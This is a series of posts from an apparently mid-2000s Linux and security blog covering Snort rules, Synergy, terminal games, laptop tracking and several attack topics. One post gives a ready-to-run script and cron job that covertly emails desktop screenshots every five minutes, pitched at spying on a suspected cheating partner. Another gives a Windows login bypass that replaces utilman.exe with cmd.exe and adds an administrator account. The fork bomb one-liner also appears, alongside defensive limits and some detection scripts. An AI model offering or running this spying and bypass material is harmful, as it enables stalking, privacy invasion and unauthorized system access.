• 22
  • Aug

Emerging Threats hosts the only open snort rule set.

Emerging Threats is funded by the National Science Foundation and the Army Research Office.

You can download the rule sets separately or all at once.

Check out the perl script to automatically update your iptables, Honeywall and Smoothwall configurations, and the inline snort config.

Confused? Read the Emerging Threats documentation site.

What is Snort?

SNORT® is an open source network intrusion prevention and detection system utilizing a rule-driven language, which combines the benefits of signature, protocol and anomaly based inspection methods. With millions of downloads to date, Snort is the most widely deployed intrusion detection and prevention technology worldwide and has become the de facto standard for the industry.

If you use Snort and don’t already know about Emerging Threats, I am sure it will help you out on your intrusion detecting escapade. If you have any tips for using the Emerging Threats rules, let us know in the comments.

  • 07
  • Aug

This article is user submitted by rich0rd. You can also submit articles.

You have multiple computers, and your desk is cluttered with keyboards, mice, and monitors? You desperately need more space, and you are tired of moving your hands the long way from one keyboard to the next? Do not worry any more - rescue is here in the form of Synergy.

Synergy is a nifty little program which allows you to share your mouse and keyboard with other computers on your network. Just move the mouse out of your screen and it magically appears on the screen of the next computer, allowing you to type there. Additionally, you can share cut and paste selections, so you can cut something on one screen/PC, move the mouse to the other screen and paste your selection there. Synergy is available for Windows (XP, NT), GNU/Linux, Mac OS X, and Unix. And the best thing is you can even mix different operating systems. Sounds interesting? So let’s see how it works.

Synergy is composed of a server (synergys) and a client part (synergyc) which communicate with each other over a network to exchange keyboard and mouse events. The server is started on the main PC whose keyboard and mouse should be shared, and the client is started on each machine which should use the input devices of the server. In the configuration file, you define which screen is to the left, right, top, or bottom of each monitor (like in other multi-monitor setups). If the mouse is moved over an edge, the control events are sent over the network to the host which is defined in the configuration.

Get it

There are binary packages available at the Synergy SourceForge page, but if you are using an OS with a package management system I recommend checking if it is available there first. Install Synergy on every machine which should participate in the input sharing.

  • 02
  • Aug

Infinity Exists features many ‘how to’ videos to quench your inner thirst for exploit information. Topics include lock picking, password cracking, email spoofing, SQL injection, and much more.

What are you waiting for? Go check out the videos!

  • 30
  • Jul

From Wikipedia:

The fork bomb is a form of denial of service attack against a computer system that implements the fork operation, or equivalent functionality whereby a running process can create another running process. It is considered a wabbit as fork bomb programs typically do not spread as worms or viruses. It relies on the assumption that the number of programs and processes which may be simultaneously executed on a computer has a limit.

Yes, the command “:(){ :|:& };:” looks like a bunch of rabid smileys, but in fact is a dangerous command that could leave your Linux system unusable until rebooted. The command essentially creates a DoS attack on the system by spawning a large number of processes and very quickly taking all available resources and process slots. This is especially important on multiuser systems like terminal servers, web servers, etc.

The jargon file also defines fork bomb.

Linux is not the only vulnerable OS, but let’s focus on the bash command structure for now, and I will fill you in on ways to prevent your system from being vulnerable to this command and to catch users who attempt to start the fork bomb.

    :(){
     :|:&
    };:

Essentially the code says:

Bomb the bombs while I drop bombs with even more bombs.

But how do I prevent the fork bomb?

Linux has a handy pam_limits module that can limit the amount of resources any one group or user can take. The configuration is stored in the /etc/security/limits.conf file. This will restrict the user or group from spawning more processes than defined in the configuration.

NOTE: This requires that you have the pam_limits module installed.

Example configuration:

user          hard    nproc           300
@group        hard    nproc           300

Replace ‘user’ with usernames and replace ‘@group’ with group names. You might have to play around with the settings and see what works best for your environment and available resources.
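To confirm which limit actually applies to a given account, the sketch below (an added example, not part of the original post) reads a limits.conf-style file and prints the hard nproc value for a user. The function names, the sample file and the precedence of user over @group over * entries are assumptions of this example; files under /etc/security/limits.d are not read.

```shell
#!/bin/sh
# Added example: report which hard nproc limit in a limits.conf-style file
# applies to a user. Assumed precedence: user entry, then @group, then "*".

# nproc_hard_limit FILE USER [GROUP...]
# Prints the matching value, or "unlimited" when no entry covers the user.
nproc_hard_limit() {
    file=$1; user=$2; shift 2
    groups=" $* "
    awk -v user="$user" -v groups="$groups" '
        /^[[:space:]]*#/ || NF < 4 { next }     # skip comments and short lines
        $3 != "nproc" { next }
        $2 != "hard" && $2 != "-" { next }      # "-" sets soft and hard together
        $1 == user { u = $4 }
        substr($1, 1, 1) == "@" && index(groups, " " substr($1, 2) " ") { g = $4 }
        $1 == "*" { w = $4 }
        END {
            if (u != "") print u
            else if (g != "") print g
            else if (w != "") print w
            else print "unlimited"
        }' "$file"
}

# Constructed sample configuration (not taken from a real system).
# bob has only a soft entry, so his hard limit comes from his group.
sample_limits() {
    cat <<'EOF'
# <domain>    <type>  <item>  <value>
*             hard    nproc   1000
@students     hard    nproc   300
alice         hard    nproc   150
bob           soft    nproc   50
EOF
}
```

On a live system, pass /etc/security/limits.conf and the groups printed by `id -Gn USER`; an answer of "unlimited" means that account is not covered by any hard nproc entry in that file.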

OK, but someone is dropping the fork bomb and I can’t tell who it is!

You could simply look in their ~/.bash_history and see, but that isn’t to say they haven’t deleted it out of the file.

The Linux kernel patch grsecurity could be another solution. I don’t have much experience with the patch so I cannot go into great detail, but the grsecurity forum has a bit of information on the issue.
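Because shell history can be edited, the process table is a more direct place to look while the processes still exist. The following added example (not from the original post) counts processes per user from `ps -eo user=,comm=` output and lists accounts at or above a threshold together with their most common command; the function names, the threshold of 250 and the sample data are constructed for illustration.

```shell
#!/bin/sh
# Added example: find accounts holding an unusual number of processes.

# flag_process_hogs THRESHOLD
# stdin: "USER COMMAND" lines, as printed by: ps -eo user=,comm=
# stdout: "USER TOTAL TOP_COMMAND TOP_COUNT", highest total first.
flag_process_hogs() {
    awk -v limit="$1" '
        NF >= 2 {
            total[$1]++
            n = ++percmd[$1 SUBSEP $2]          # per-user, per-command count
            if (n > best[$1]) { best[$1] = n; bestcmd[$1] = $2 }
        }
        END {
            for (u in total)
                if (total[u] >= limit)
                    printf "%s %d %s %d\n", u, total[u], bestcmd[u], best[u]
        }' | sort -k2,2nr
}

# Constructed sample input: one account with 280 copies of the same shell,
# which is what a fork bomb held back by an nproc limit of 300 looks like.
sample_ps() {
    printf 'root sshd\nroot cron\nalice vim\nalice bash\n'
    i=0
    while [ "$i" -lt 280 ]; do
        echo 'mallory bash'
        i=$((i + 1))
    done
    printf 'mallory ssh\n'
}

# Live use, run as root:  ps -eo user=,comm= | flag_process_hogs 250
```

With a per-user nproc limit in place, the flagged account sits at its ceiling while root can still start `ps`, so the check remains usable during the incident.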

If you have not set up ways to protect your multiuser system from the fork bomb, it just might leave you dropping the F bomb. We wouldn’t want to hear any system administrator saying that, would we?

Know any other ways to create the fork bomb? Leave a suggestion in the comments.

  • 19
  • Jul

Not a Linux user? Stay tuned, I will be posting a Windows version soon.

Have suspicions about what goes on on your own computer when you are away? Think someone might be cheating? Do you often see that the history has been deleted out of the browser? Maybe you just want to keep tabs on what your kids are looking at when you aren’t right there watching.

By using some basic Linux commands and utilities (import, cron, postfix, and mutt) we can spy on any PC we have root access to.

The process is as follows:

  1. Cron takes a screen shot of the desktop and saves it to a file using the import command.
  2. Cron emails the screenshot to a specified address on a specific interval by using mutt.

The process is quite simple. Just open your terminal and follow these steps (tested on Ubuntu, should work on other distros as well):

  1. Install postfix, mutt, and imagemagick (for import):
     sudo apt-get install postfix mutt imagemagick
  2. Create a message text file with something in it. Doesn’t matter what, just so it doesn’t get caught by the spam filters:
      nano /path/to/message.txt
  3. Create a file named ‘spy.sh’ (save it somewhere secretive) and add the following lines (the mutt command is a single line). Change emailaccount@domain.com to your email address. Feel free to remove the rm command if you would like to keep the images stored locally (I would recommend moving them out of the /tmp directory though):

      #!/bin/sh
      # %H gives a zero-padded hour, so the file name never contains a space
      NOW=$(date +%Y%m%d%H%M)
      cd /tmp
      import -window root "screenshot-$NOW.jpg"
      mutt -s "Screenshot for $NOW" -a "./screenshot-$NOW.jpg" emailaccount@domain.com < /path/to/message.txt
      rm "/tmp/screenshot-$NOW.jpg"
  4. Now make the spy.sh executable:
      chmod u+x /path/to/spy.sh
  5. Run the following (my cron didn’t run without it):
      sudo touch /etc/cron.deny
  6. Edit your crontab (‘sudo crontab -e’) and enter the following:
     */5 * * * * /path/to/spy.sh

WARNING: This will email you a screen shot every 5 minutes. While this is great for spying, beware that your email could fill up pretty quickly! Raise the step value in your crontab to send less often, e.g. */10 for every 10 minutes or */20 for every 20 minutes.

TIP: If you don’t want the screenshot emailer running while you are on the PC just comment out the line we added with a ‘#’ at the beginning. Don’t forget to change it back before you leave!

TIP: If you aren’t receiving your messages your email server might be rejecting the email because it is originating from a dynamic IP range. In this case, you will need to configure mutt to use your email server instead.

That’s it! You should start receiving screen shots of your desktop in action once the crontab has been hit the first cycle. If you have any problems or questions feel free to leave a comment.

  • 19
  • Jul

Adeona is an open source system used to securely and privately track the location of your Windows, Mac, or Linux laptop.

What makes Adeona stand out, even from proprietary solutions, is its ability to securely transmit the location data, preventing 3rd parties from also gathering the information.

Keep in mind that Adeona is still in beta, so don’t expect a perfect program just yet. Please do report any bugs that you might find.

Installation methods differ between operating systems so be sure to read the download instructions.

One interesting question from the FAQs:

Can I install this on my girlfriend or boyfriend’s computer and track her or him, and perhaps get pictures of them while they’re doing certain activities?

Yes. Like all technologies, Adeona has the potential for being abused. However, if you are malicious enough to want to do the above, there is probably other software available out there more suited for your needs. (We won’t provide links to these more malicious tools.)

Adeona seems to be a good solution to give you peace of mind that if your laptop gets stolen, you might have a chance to retrieve it.

If you have any other suggestions for software to track your stolen laptop, please let us know in the comments as always.

  • 10
  • Jul

Have you ever changed or forgotten your Windows password? Fear not because I have the solution for you - and it’s completely free.

The following method works on Windows XP and Vista.

All you need is a Linux live CD (that auto mounts Windows partitions - ex. Ubuntu, Backtrack, Fedora, openSUSE).

Save the .iso and burn it to a disc.

Boot from the CD and follow these simple instructions - these instructions assume you are using BackTrack, but should be similar for other Linux distributions:

  1. Open a Linux terminal and enter the following commands:
  2. cd /mnt
  3. ls (Take note of the folders listed here. You might need them in the next step.)
  4. cd sda1/Windows/System32/ (If this didn’t work you might have the wrong hard drive, try replacing ’sda1′ with sda2, hda1, or hda2)
  5. mv utilman.exe utilman.old && cp cmd.exe utilman.exe
  6. reboot (and remove the CD)
  7. Once rebooted, at Vista or XP log in screen, Press Windows key + U to run CMD with system privileges. Replace username below with the one of your choice - it must not already exist!
  8. c:\>net user username mypassword /add
  9. c:\>net localgroup administrators username /add
  10. Log in with the new admin account!

After completing don’t forget to copy the utilman.old back to utilman.exe or you will leave your system vulnerable - this is very important!!
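To verify that the restore really happened, the mounted System32 directory can be checked from the same live CD. This is an added example, not part of the original post: it reports whether utilman.exe is still a byte-for-byte copy of cmd.exe and whether the utilman.old backup is still lying around. The function names and state labels are hypothetical, and names are matched case-insensitively because the on-disk capitalization may differ from the lowercase used above.

```shell
#!/bin/sh
# Added example: check the state of utilman.exe on a mounted Windows partition.

# find_ci DIR NAME: print the path of NAME inside DIR, ignoring case.
find_ci() {
    find "$1" -maxdepth 1 -iname "$2" | head -n 1
}

# utilman_state SYSTEM32_DIR
# Prints one of:
#   swapped   utilman.exe is identical to cmd.exe (Windows key + U at the
#             login screen still opens a command prompt)
#   leftover  utilman.exe differs from cmd.exe, but utilman.old is still there
#   ok        utilman.exe differs from cmd.exe and no backup copy remains
#   missing   utilman.exe or cmd.exe was not found in the directory
utilman_state() {
    dir=$1
    util=$(find_ci "$dir" utilman.exe)
    cmd=$(find_ci "$dir" cmd.exe)
    old=$(find_ci "$dir" utilman.old)
    if [ -z "$util" ] || [ -z "$cmd" ]; then
        echo missing
    elif cmp -s "$util" "$cmd"; then
        echo swapped
    elif [ -n "$old" ]; then
        echo leftover
    else
        echo ok
    fi
}

# Usage from the live CD, e.g.:  sh check.sh /mnt/sda1/Windows/System32
if [ "$#" -gt 0 ]; then
    utilman_state "$1"
fi
```

A result of "swapped" on a machine where nobody is known to have run this procedure is worth investigating, since it means anyone at the login screen gets the same access.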

I hope this helped in regaining access into your XP or Vista PC and if you know of any other tips like this please let us know in the comments.

UPDATE: Here is a backtrack video tutorial that covers the instructions.

  • 03
  • Jul

Nothing is better than a 3D game, but when you haven’t installed a GUI and have a quick need to play for a bit, here are 4 text based Linux games for CLI:

1. Bastet - Tetris clone:


Bastet ("bastard tetris") is an ncurses Tetris clone which is harder than every other tetris released. It is based on a heuristics engine which tries to detect which block you need or don’t need, and then gives you the blocks that you don’t need. For instance, if you usually play by leaving long "canyons" one square wide and then waiting for the long "I" block, you’ll have to wait till eternity before you see it. The heuristics have been worked on for some time and are quite nasty.

Install Bastet on Ubuntu:

sudo apt-get install bastet

2. Ninvaders - Space Invaders Clone:


nInvaders project is a Space Invaders clone for ncurses.

Ever wanted to play space invaders when you can’t find a GUI? Now you can!

Install Ninvaders on Ubuntu:

sudo apt-get install ninvaders

3. Moon-buggy - drive on the moon:


Moon-buggy is a simple character graphics game, where you drive some kind of car across the moon’s surface. Unfortunately there are dangerous craters there. Fortunately your car can jump over them!

Install Moon-buggy on Ubuntu:

sudo apt-get install moon-buggy

4. Greed - a puzzle game:


The strategy game of Greed. Try to eat as much as possible of the board before munching yourself into a corner.

Install Greed on Ubuntu:

sudo apt-get install greed

Hope you enjoy playing these simple, but fun Linux based CLI games. You can play any of these games by entering “/usr/games/xxxxx” with the Xs being the name of the game.

Do you know of any other fun CLI based games for Linux? Let us know in the comments. [via mellowd.co.uk]

  • 02
  • Jul

Got to get this t-shirt:

Best.T-Shirt.Eva

Get your t-shirt here.

  • 24
  • Jun

Tech.shantanugoel.com writes about how to create a do-it-yourself security system using nothing more than a Linux PC, Webcam, and a Twitter account.

No more brother, mother, burglar, etc. stepping into your private space or home without you knowing. Also, don’t forget about enabling Twitter mobile alerts for when a PC might be far from reach.